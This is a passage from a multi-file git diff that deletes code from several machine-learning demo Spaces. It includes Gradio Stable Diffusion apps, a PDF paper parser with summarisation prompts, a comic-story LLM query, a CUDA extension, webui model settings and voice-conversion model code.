(Prompt, negative_prompt, height, width, scale, steps, seed, upscale, upscale_prompt, upscale_neg, upscale_scale, upscale_steps): - generator = torch.Generator(device=device).manual_seed(seed) - if upscale == "Yes": - low_res_latents = pipe(Prompt, negative_prompt=negative_prompt, height=height, width=width, num_inference_steps=steps, guidance_scale=scale, generator=generator, output_type="latent").images - image = upscaler(prompt=upscale_prompt, negative_prompt=upscale_neg, image=low_res_latents, num_inference_steps=upscale_steps, guidance_scale=upscale_scale, generator=generator).images[0] - else: - image = pipe(Prompt, negative_prompt=negative_prompt, height=height, width=width, num_inference_steps=steps, guidance_scale=scale, generator=generator).images[0] - return image - -gr.Interface(theme='HaleyCH/HaleyCH_Theme', fn=genie, inputs=[gr.Textbox(label='Input field right under here(Prompt)'), - gr.Textbox(label='What You dont want (Negative Prompt)'), - gr.Slider(512, 1024, 768, step=128, label='Height'), - gr.Slider(512, 1024, 768, step=128, label='Width'), - gr.Slider(1, maximum=15, value=10, step=.25), - gr.Slider(25, maximum=100, value=50, step=25), - gr.Slider(minimum=1, step=1, maximum=9999999999999999, randomize=True), - gr.Radio(["Yes", "No"], label='Upscale?'), - gr.Textbox(label='Upscaler Prompt: Optional'), - gr.Textbox(label='Upscaler Negative Prompt: Both Optional And Experimental'), - gr.Slider(minimum=0, maximum=15, value=0, step=1, label='Upscale Guidance Scale'), - gr.Slider(minimum=5, maximum=25, value=5, step=5, label='Upscaler Iterations') - - ], - outputs=gr.Image(label='Generated Image'), - title="Our Free Image Creator", - description="

      TIPS:
      To get the best result read the instructions undeneath the App.
      This Free App is slow producing Images.
      Join us , And get access to this App and many more. They work faster and have more advanced features", - article = "Online App: www.aichatbot.ai").launch(debug=True, max_threads=True) diff --git a/spaces/Danielzero/GPT3.5/modules/pdf_func.py b/spaces/Danielzero/GPT3.5/modules/pdf_func.py deleted file mode 100644 index 0aba6b7b891fc527c79b887256b0cbaa81ae5b3d..0000000000000000000000000000000000000000 --- a/spaces/Danielzero/GPT3.5/modules/pdf_func.py +++ /dev/null @@ -1,180 +0,0 @@ -from types import SimpleNamespace -import pdfplumber -import logging -from llama_index import Document - -def prepare_table_config(crop_page): - """Prepare table查找边界, 要求page为原始page - - From https://github.com/jsvine/pdfplumber/issues/242 - """ - page = crop_page.root_page # root/parent - cs = page.curves + page.edges - def curves_to_edges(): - """See https://github.com/jsvine/pdfplumber/issues/127""" - edges = [] - for c in cs: - edges += pdfplumber.utils.rect_to_edges(c) - return edges - edges = curves_to_edges() - return { - "vertical_strategy": "explicit", - "horizontal_strategy": "explicit", - "explicit_vertical_lines": edges, - "explicit_horizontal_lines": edges, - "intersection_y_tolerance": 10, - } - -def get_text_outside_table(crop_page): - ts = prepare_table_config(crop_page) - if len(ts["explicit_vertical_lines"]) == 0 or len(ts["explicit_horizontal_lines"]) == 0: - return crop_page - - ### Get the bounding boxes of the tables on the page. - bboxes = [table.bbox for table in crop_page.root_page.find_tables(table_settings=ts)] - def not_within_bboxes(obj): - """Check if the object is in any of the table's bbox.""" - def obj_in_bbox(_bbox): - """See https://github.com/jsvine/pdfplumber/blob/stable/pdfplumber/table.py#L404""" - v_mid = (obj["top"] + obj["bottom"]) / 2 - h_mid = (obj["x0"] + obj["x1"]) / 2 - x0, top, x1, bottom = _bbox - return (h_mid >= x0) and (h_mid < x1) and (v_mid >= top) and (v_mid < bottom) - return not any(obj_in_bbox(__bbox) for __bbox in bboxes) - - return crop_page.filter(not_within_bboxes) -# 请使用 LaTeX 表达公式,行内公式以 $ 包裹,行间公式以 $$ 包裹 - -extract_words = lambda page: page.extract_words(keep_blank_chars=True, y_tolerance=0, x_tolerance=1, extra_attrs=["fontname", "size", "object_type"]) -# dict_keys(['text', 'x0', 'x1', 'top', 'doctop', 'bottom', 'upright', 'direction', 'fontname', 'size']) - -def get_title_with_cropped_page(first_page): - title = [] # 处理标题 - x0,top,x1,bottom = first_page.bbox # 获取页面边框 - - for word in extract_words(first_page): - word = SimpleNamespace(**word) - - if word.size >= 14: - title.append(word.text) - title_bottom = word.bottom - elif word.text == "Abstract": # 获取页面abstract - top = word.top - - user_info = [i["text"] for i in extract_words(first_page.within_bbox((x0,title_bottom,x1,top)))] - # 裁剪掉上半部分, within_bbox: full_included; crop: partial_included - return title, user_info, first_page.within_bbox((x0,top,x1,bottom)) - -def get_column_cropped_pages(pages, two_column=True): - new_pages = [] - for page in pages: - if two_column: - left = page.within_bbox((0, 0, page.width/2, page.height),relative=True) - right = page.within_bbox((page.width/2, 0, page.width, page.height), relative=True) - new_pages.append(left) - new_pages.append(right) - else: - new_pages.append(page) - - return new_pages - -def parse_pdf(filename, two_column = True): - level = logging.getLogger().level - if level == logging.getLevelName("DEBUG"): - logging.getLogger().setLevel("INFO") - - with pdfplumber.open(filename) as pdf: - title, user_info, first_page = get_title_with_cropped_page(pdf.pages[0]) - new_pages = get_column_cropped_pages([first_page] + pdf.pages[1:], two_column) - - chapters = [] - # tuple (chapter_name, [pageid] (start,stop), chapter_text) - create_chapter = lambda page_start,name_top,name_bottom: SimpleNamespace( - name=[], - name_top=name_top, - name_bottom=name_bottom, - record_chapter_name = True, - - page_start=page_start, - page_stop=None, - - text=[], - ) - cur_chapter = None - - # 按页遍历PDF文档 - for idx, page in enumerate(new_pages): - page = get_text_outside_table(page) - - # 按行遍历页面文本 - for word in extract_words(page): - word = SimpleNamespace(**word) - - # 检查行文本是否以12号字体打印,如果是,则将其作为新章节开始 - if word.size >= 11: # 出现chapter name - if cur_chapter is None: - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - elif not cur_chapter.record_chapter_name or (cur_chapter.name_bottom != cur_chapter.name_bottom and cur_chapter.name_top != cur_chapter.name_top): - # 不再继续写chapter name - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - # 重置当前chapter信息 - cur_chapter = create_chapter(page.page_number, word.top, word.bottom) - - # print(word.size, word.top, word.bottom, word.text) - cur_chapter.name.append(word.text) - else: - cur_chapter.record_chapter_name = False # chapter name 结束 - cur_chapter.text.append(word.text) - else: - # 处理最后一个章节 - cur_chapter.page_stop = page.page_number # stop id - chapters.append(cur_chapter) - - for i in chapters: - logging.info(f"section: {i.name} pages:{i.page_start, i.page_stop} word-count:{len(i.text)}") - logging.debug(" ".join(i.text)) - - title = " ".join(title) - user_info = " ".join(user_info) - text = f"Article Title: {title}, Information:{user_info}\n" - for idx, chapter in enumerate(chapters): - chapter.name = " ".join(chapter.name) - text += f"The {idx}th Chapter {chapter.name}: " + " ".join(chapter.text) + "\n" - - logging.getLogger().setLevel(level) - return Document(text=text, extra_info={"title": title}) - -BASE_POINTS = """ -1. Who are the authors? -2. What is the process of the proposed method? -3. What is the performance of the proposed method? Please note down its performance metrics. -4. What are the baseline models and their performances? Please note down these baseline methods. -5. What dataset did this paper use? -""" - -READING_PROMPT = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{} -""" - -READING_PROMT_V2 = """ -You are a researcher helper bot. You can help the user with research paper reading and summarizing. \n -Now I am going to send you a paper. You need to read it and summarize it for me part by part. \n -When you are reading, You need to focus on these key points:{}, - -And You need to generate a brief but informative title for this part. -Your return format: -- title: '...' -- summary: '...' -""" - -SUMMARY_PROMPT = "You are a researcher helper bot. Now you need to read the summaries of a research paper." - - -if __name__ == '__main__': - # Test code - z = parse_pdf("./build/test.pdf") - print(z["user_info"]) - print(z["title"]) \ No newline at end of file diff --git a/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts b/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts deleted file mode 100644 index 8d1525b6289da05ab24eb2386fd99b7e5367581d..0000000000000000000000000000000000000000 --- a/spaces/Detomo/ai-comic-generation/src/app/queries/getStory.ts +++ /dev/null @@ -1,83 +0,0 @@ -import { createLlamaPrompt } from "@/lib/createLlamaPrompt" -import { dirtyLLMResponseCleaner } from "@/lib/dirtyLLMResponseCleaner" -import { dirtyLLMJsonParser } from "@/lib/dirtyLLMJsonParser" -import { dirtyCaptionCleaner } from "@/lib/dirtyCaptionCleaner" - -import { predict } from "./predict" -import { Preset } from "../engine/presets" -import { LLMResponse } from "@/types" -import { cleanJson } from "@/lib/cleanJson" - -export const getStory = async ({ - preset, - prompt = "", -}: { - preset: Preset; - prompt: string; -}): Promise => { - - const query = createLlamaPrompt([ - { - role: "system", - content: [ - `You are a comic book author specialized in ${preset.llmPrompt}`, - `Please write detailed drawing instructions and a one-sentence short caption for the 4 panels of a new silent comic book page.`, - `Give your response as a JSON array like this: \`Array<{ panel: number; instructions: string; caption: string}>\`.`, - // `Give your response as Markdown bullet points.`, - `Be brief in your 4 instructions and captions, don't add your own comments. Be straight to the point, and never reply things like "Sure, I can.." etc.` - ].filter(item => item).join("\n") - }, - { - role: "user", - content: `The story is: ${prompt}`, - } - ]) + "```json\n[" - - - let result = "" - - try { - result = `${await predict(query) || ""}`.trim() - if (!result.length) { - throw new Error("empty result!") - } - } catch (err) { - console.log(`prediction of the story failed, trying again..`) - try { - result = `${await predict(query+".") || ""}`.trim() - if (!result.length) { - throw new Error("empty result!") - } - } catch (err) { - console.error(`prediction of the story failed again!`) - throw new Error(`failed to generate the story ${err}`) - } - } - - // console.log("Raw response from LLM:", result) - const tmp = cleanJson(result) - - let llmResponse: LLMResponse = [] - - try { - llmResponse = dirtyLLMJsonParser(tmp) - } catch (err) { - console.log(`failed to read LLM response: ${err}`) - console.log(`original response was:`, result) - - // in case of failure here, it might be because the LLM hallucinated a completely different response, - // such as markdown. There is no real solution.. but we can try a fallback: - - llmResponse = ( - tmp.split("*") - .map(item => item.trim()) - .map((cap, i) => ({ - panel: i, - caption: cap, - instructions: cap, - })) - ) - } - - return llmResponse.map(res => dirtyCaptionCleaner(res)) -} \ No newline at end of file diff --git a/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp b/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp deleted file mode 100644 index 5d2425d8054991a8e8b6f7a940fd0ff7fa0bb330..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan-Inversion/PTI/torch_utils/ops/bias_act.cpp +++ /dev/null @@ -1,99 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include -#include -#include -#include "bias_act.h" - -//------------------------------------------------------------------------ - -static bool has_same_layout(torch::Tensor x, torch::Tensor y) -{ - if (x.dim() != y.dim()) - return false; - for (int64_t i = 0; i < x.dim(); i++) - { - if (x.size(i) != y.size(i)) - return false; - if (x.size(i) >= 2 && x.stride(i) != y.stride(i)) - return false; - } - return true; -} - -//------------------------------------------------------------------------ - -static torch::Tensor bias_act(torch::Tensor x, torch::Tensor b, torch::Tensor xref, torch::Tensor yref, torch::Tensor dy, int grad, int dim, int act, float alpha, float gain, float clamp) -{ - // Validate arguments. - TORCH_CHECK(x.is_cuda(), "x must reside on CUDA device"); - TORCH_CHECK(b.numel() == 0 || (b.dtype() == x.dtype() && b.device() == x.device()), "b must have the same dtype and device as x"); - TORCH_CHECK(xref.numel() == 0 || (xref.sizes() == x.sizes() && xref.dtype() == x.dtype() && xref.device() == x.device()), "xref must have the same shape, dtype, and device as x"); - TORCH_CHECK(yref.numel() == 0 || (yref.sizes() == x.sizes() && yref.dtype() == x.dtype() && yref.device() == x.device()), "yref must have the same shape, dtype, and device as x"); - TORCH_CHECK(dy.numel() == 0 || (dy.sizes() == x.sizes() && dy.dtype() == x.dtype() && dy.device() == x.device()), "dy must have the same dtype and device as x"); - TORCH_CHECK(x.numel() <= INT_MAX, "x is too large"); - TORCH_CHECK(b.dim() == 1, "b must have rank 1"); - TORCH_CHECK(b.numel() == 0 || (dim >= 0 && dim < x.dim()), "dim is out of bounds"); - TORCH_CHECK(b.numel() == 0 || b.numel() == x.size(dim), "b has wrong number of elements"); - TORCH_CHECK(grad >= 0, "grad must be non-negative"); - - // Validate layout. - TORCH_CHECK(x.is_non_overlapping_and_dense(), "x must be non-overlapping and dense"); - TORCH_CHECK(b.is_contiguous(), "b must be contiguous"); - TORCH_CHECK(xref.numel() == 0 || has_same_layout(xref, x), "xref must have the same layout as x"); - TORCH_CHECK(yref.numel() == 0 || has_same_layout(yref, x), "yref must have the same layout as x"); - TORCH_CHECK(dy.numel() == 0 || has_same_layout(dy, x), "dy must have the same layout as x"); - - // Create output tensor. - const at::cuda::OptionalCUDAGuard device_guard(device_of(x)); - torch::Tensor y = torch::empty_like(x); - TORCH_CHECK(has_same_layout(y, x), "y must have the same layout as x"); - - // Initialize CUDA kernel parameters. - bias_act_kernel_params p; - p.x = x.data_ptr(); - p.b = (b.numel()) ? b.data_ptr() : NULL; - p.xref = (xref.numel()) ? xref.data_ptr() : NULL; - p.yref = (yref.numel()) ? yref.data_ptr() : NULL; - p.dy = (dy.numel()) ? dy.data_ptr() : NULL; - p.y = y.data_ptr(); - p.grad = grad; - p.act = act; - p.alpha = alpha; - p.gain = gain; - p.clamp = clamp; - p.sizeX = (int)x.numel(); - p.sizeB = (int)b.numel(); - p.stepB = (b.numel()) ? (int)x.stride(dim) : 1; - - // Choose CUDA kernel. - void* kernel; - AT_DISPATCH_FLOATING_TYPES_AND_HALF(x.scalar_type(), "upfirdn2d_cuda", [&] - { - kernel = choose_bias_act_kernel(p); - }); - TORCH_CHECK(kernel, "no CUDA kernel found for the specified activation func"); - - // Launch CUDA kernel. - p.loopX = 4; - int blockSize = 4 * 32; - int gridSize = (p.sizeX - 1) / (p.loopX * blockSize) + 1; - void* args[] = {&p}; - AT_CUDA_CHECK(cudaLaunchKernel(kernel, gridSize, blockSize, args, 0, at::cuda::getCurrentCUDAStream())); - return y; -} - -//------------------------------------------------------------------------ - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) -{ - m.def("bias_act", &bias_act); -} - -//------------------------------------------------------------------------ diff --git a/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py b/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py deleted file mode 100644 index f1610d96045689eac49dae76c65bdcc196370365..0000000000000000000000000000000000000000 --- a/spaces/Duskfallcrew/duskfall-s-vaporwave-aesthetic/app.py +++ /dev/null @@ -1,137 +0,0 @@ -from diffusers import StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image - -model_id = 'Duskfallcrew/duskfall-s-vaporwave-aesthetic' -prefix = 'vapodusk1' - -scheduler = DPMSolverMultistepScheduler.from_pretrained(model_id, subfolder="scheduler") - -pipe = StableDiffusionPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained( - model_id, - torch_dtype=torch.float16 if torch.cuda.is_available() else torch.float32, - scheduler=scheduler) - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - pipe_i2i = pipe_i2i.to("cuda") - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - -def inference(prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt="", auto_prefix=False): - - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - prompt = f"{prefix} {prompt}" if auto_prefix else prompt - - try: - if img is not None: - return img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - -def txt_to_img(prompt, neg_prompt, guidance, steps, width, height, generator): - - result = pipe( - prompt, - negative_prompt = neg_prompt, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -def img_to_img(prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - ratio = min(height / img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe_i2i( - prompt, - negative_prompt = neg_prompt, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return result.images[0] - -css = """.main-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.main-div div h1{font-weight:900;margin-bottom:7px}.main-div p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -
      -
      -

      Duskfall S Vaporwave Aesthetic

      -
      -

      - Demo for Duskfall S Vaporwave Aesthetic Stable Diffusion model. All samples and info are here: https://civitai.com/user/duskfallcrew If you want to donate towards costs and don't want to subscribe: https://ko-fi.com/DUSKFALLcrew If you want to monthly support the EARTH & DUSK media projects and not just AI: https://www.patreon.com/earthndusk - √ "vapodusk1" on your prompts!
      - {"Add the following tokens to your prompts for the model to work properly: prefix" if prefix else ""} -

      - Running on {"GPU 🔥" if torch.cuda.is_available() else f"CPU 🥶. For faster inference it is recommended to upgrade to GPU in Settings"} after duplicating the space

      - Duplicate Space -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False, max_lines=2,placeholder=f"{prefix} [your prompt]").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - image_out = gr.Image(height=512) - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - auto_prefix = gr.Checkbox(label="Prefix styling tokens automatically (vapodusk1)", value=prefix, visible=prefix) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=7.5, maximum=15) - steps = gr.Slider(label="Steps", value=25, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - auto_prefix.change(lambda x: gr.update(placeholder=f"{prefix} [your prompt]" if x else "[Your prompt]"), inputs=auto_prefix, outputs=prompt, queue=False) - - inputs = [prompt, guidance, steps, width, height, seed, image, strength, neg_prompt, auto_prefix] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - gr.HTML(""" -
      -
      -

      This space was created using SD Space Creator.

      -
      - """) - -demo.queue(concurrency_count=1) -demo.launch() diff --git a/spaces/ECCV2022/bytetrack/README.md b/spaces/ECCV2022/bytetrack/README.md deleted file mode 100644 index 07e8c5bce0cb37a34864eabe30d822aa1c61e90f..0000000000000000000000000000000000000000 --- a/spaces/ECCV2022/bytetrack/README.md +++ /dev/null @@ -1,38 +0,0 @@ ---- -title: Bytetrack -emoji: 🏢 -colorFrom: blue -colorTo: blue -sdk: gradio -sdk_version: 3.1.1 -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/Emanuel/porttagger/README.md b/spaces/Emanuel/porttagger/README.md deleted file mode 100644 index aa57d08992dcf15a73404d4a5460da2de86b4693..0000000000000000000000000000000000000000 --- a/spaces/Emanuel/porttagger/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Porttagger -emoji: ✍️ -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 3.9.1 -app_file: app.py -pinned: true -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/EsoCode/text-generation-webui/modules/models_settings.py b/spaces/EsoCode/text-generation-webui/modules/models_settings.py deleted file mode 100644 index 0207e7de76e54f438ee98d3b4e8344446796dd47..0000000000000000000000000000000000000000 --- a/spaces/EsoCode/text-generation-webui/modules/models_settings.py +++ /dev/null @@ -1,134 +0,0 @@ -import re -from pathlib import Path - -import yaml - -from modules import shared, ui - - -def get_model_settings_from_yamls(model): - settings = shared.model_config - model_settings = {} - for pat in settings: - if re.match(pat.lower(), model.lower()): - for k in settings[pat]: - model_settings[k] = settings[pat][k] - - return model_settings - - -def infer_loader(model_name): - path_to_model = Path(f'{shared.args.model_dir}/{model_name}') - model_settings = get_model_settings_from_yamls(model_name) - if not path_to_model.exists(): - loader = None - elif Path(f'{shared.args.model_dir}/{model_name}/quantize_config.json').exists() or ('wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0): - loader = 'AutoGPTQ' - elif len(list(path_to_model.glob('*ggml*.bin'))) > 0: - loader = 'llama.cpp' - elif re.match('.*ggml.*\.bin', model_name.lower()): - loader = 'llama.cpp' - elif re.match('.*rwkv.*\.pth', model_name.lower()): - loader = 'RWKV' - elif shared.args.flexgen: - loader = 'FlexGen' - else: - loader = 'Transformers' - - return loader - - -# UI: update the command-line arguments based on the interface values -def update_model_parameters(state, initial=False): - elements = ui.list_model_elements() # the names of the parameters - gpu_memories = [] - - for i, element in enumerate(elements): - if element not in state: - continue - - value = state[element] - if element.startswith('gpu_memory'): - gpu_memories.append(value) - continue - - if initial and vars(shared.args)[element] != vars(shared.args_defaults)[element]: - continue - - # Setting null defaults - if element in ['wbits', 'groupsize', 'model_type'] and value == 'None': - value = vars(shared.args_defaults)[element] - elif element in ['cpu_memory'] and value == 0: - value = vars(shared.args_defaults)[element] - - # Making some simple conversions - if element in ['wbits', 'groupsize', 'pre_layer']: - value = int(value) - elif element == 'cpu_memory' and value is not None: - value = f"{value}MiB" - - if element in ['pre_layer']: - value = [value] if value > 0 else None - - setattr(shared.args, element, value) - - found_positive = False - for i in gpu_memories: - if i > 0: - found_positive = True - break - - if not (initial and vars(shared.args)['gpu_memory'] != vars(shared.args_defaults)['gpu_memory']): - if found_positive: - shared.args.gpu_memory = [f"{i}MiB" for i in gpu_memories] - else: - shared.args.gpu_memory = None - - -# UI: update the state variable with the model settings -def apply_model_settings_to_state(model, state): - model_settings = get_model_settings_from_yamls(model) - if 'loader' not in model_settings: - loader = infer_loader(model) - if 'wbits' in model_settings and type(model_settings['wbits']) is int and model_settings['wbits'] > 0: - loader = 'AutoGPTQ' - - # If the user is using an alternative GPTQ loader, let them keep using it - if not (loader == 'AutoGPTQ' and state['loader'] in ['GPTQ-for-LLaMa', 'ExLlama', 'ExLlama_HF']): - state['loader'] = loader - - for k in model_settings: - if k in state: - state[k] = model_settings[k] - - return state - - -# Save the settings for this model to models/config-user.yaml -def save_model_settings(model, state): - if model == 'None': - yield ("Not saving the settings because no model is loaded.") - return - - with Path(f'{shared.args.model_dir}/config-user.yaml') as p: - if p.exists(): - user_config = yaml.safe_load(open(p, 'r').read()) - else: - user_config = {} - - model_regex = model + '$' # For exact matches - for _dict in [user_config, shared.model_config]: - if model_regex not in _dict: - _dict[model_regex] = {} - - if model_regex not in user_config: - user_config[model_regex] = {} - - for k in ui.list_model_elements(): - user_config[model_regex][k] = state[k] - shared.model_config[model_regex][k] = state[k] - - with open(p, 'w') as f: - f.write(yaml.dump(user_config, sort_keys=False)) - - yield (f"Settings for {model} saved to {p}") diff --git a/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py b/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py deleted file mode 100644 index 963e67b29f828e9fdd096397952054fe77cf3d10..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-genshin-v2/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,819 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - 